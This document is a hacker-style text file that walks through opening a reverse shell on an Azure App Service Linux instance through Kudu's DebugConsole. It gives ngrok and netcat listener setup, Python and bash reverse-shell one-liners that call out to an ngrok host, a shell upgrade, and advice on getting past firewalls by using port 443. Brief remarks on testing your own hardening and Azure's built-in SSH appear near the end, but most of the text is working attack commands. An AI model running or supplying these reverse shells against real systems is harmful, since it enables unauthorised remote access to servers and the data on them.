____________________ _____________________
/ \/ \
| 4 FUN & PR0F1T: | a hax0rz gu1de 2 |
| AZURE KUDU OWNED | rev shellz & lulz |
\____________________/\_____________________/
by: ][nfiltrat0r_X // released into the wild // 2k2X
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"if you didn't own it first, you don't own it at all."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[INTRO - read or GTFO]
So you got an Azure App Service Linux box and you want a shell. Good. You should want a shell. Shells are beautiful.
Here's the deal: inbound SSH from outside? BLOCKED. Azure said no. Azure is a coward. BUT outbound TCP? Wide open like the front page of hacker news. So we flip it. Reverse shell. Oldest trick in the book. Still works. Always will.
This is your box. Your infra. We're just here to remind you how to use it properly. Now pay attention.
[PHASE 1 - arm your local rig]
Step 1: Get ngrok. If you don't have ngrok you're already behind.
# pop a TCP tunnel -- give the box a number to call home to
ngrok tcp 4444
# it spits something like:
# Forwarding tcp://0.tcp.ngrok.io:12345 -> localhost:4444
# WRITE THAT DOWN. that's your beeper number.
# now sit there and wait like a patient predator
nc -lvp 4444
Both windows stay OPEN. Don't be dumb. Don't close them. Go grab coffee if you want but those windows STAY OPEN.
[PHASE 2 - make the box call home]
Drop into Kudu DebugConsole at /DebugConsole on your SCM endpoint. Or use whatever RCE vector you're testing. No judgment.
METHOD A: python3 (almost always available — bless Microsoft for not being TOTALLY useless here)
python3 -c '
import socket,os,pty
s=socket.socket()
s.connect(("0.tcp.ngrok.io",12345))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")'
METHOD B: bash one-liner, for the lazy (respect)
bash -i >& /dev/tcp/0.tcp.ngrok.io/12345 0>&1
Your nc window should light up. BOOM. You're in. Take a moment. Breathe. You earned it.
[PHASE 3 - don't be a n00b, upgrade your shell]
Raw netcat shell is suffering. Tab complete doesn't work. Ctrl+C kills the connection. Vim looks like a ransom note. FIX IT.
# spawn a proper PTY like a civilized hacker
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z (background that sucker)
# fix your local terminal so you stop crying
stty raw -echo; fg
# tell the remote what kind of terminal you're running
export TERM=xterm
Now you have tab complete. Arrow keys. Command history. You are no longer a feral creature. Welcome to the good life.
[AZURE LANDMINES - read or get rekt]
PORT GAMES: Port 4444 might get slapped by NSGs if VNet integration is in play. Azure loves its little firewalls. Trick them:
ngrok tcp 443 # 443 gets through almost everywhere.
# nobody blocks 443. nobody.
VNET-INTEGRATED APPS:
Outbound routes through subnet NSGs. If your shell isn't connecting, check whether TCP egress to *.ngrok.io is even allowed before you lose your mind.
THE REAL LESSON (for the blue teamers reading this): If you're testing your OWN hardening — this whole exercise shows you exactly what to lock down. Block outbound TCP to untrusted destinations and the reverse shell dies before it even tries to call home. THAT's the fix. Go do it.
[FOR THE LAZY / LEGIT DEBUG - Kudu SSH]
Don't want to do any of the above? Fine. Azure gave you a free shell and you've been ignoring it like a fool:
https://<appname>.scm.azurewebsites.net/webssh/host
Or from CLI if you're too good for browsers:
az webapp ssh --name <appname> --resource-group <rg>
No ngrok. No listener. No port games. It just works. Use this for daily debugging. Use the reverse shell to TEST whether your outbound controls actually do what you think they do.
[GREETZ & SHOUTOUTZ]
Shouts to: all the sysadmins who thought "nobody would ever"
Shouts to: ngrok for existing
Shouts to: Azure for leaving outbound TCP open by default
Shouts to: you, for reading this far
No shouts to: script kiddies who skip the notes, people who don't upgrade their PTY, whoever decided port 22 should be blocked inbound
This nfo is released as-is. No warranty. No refunds. Own your own stuff. Don't be evil. Have fun. Stay curious.
[EOF - ][nfiltrat0r_X]
Henter kommentarer...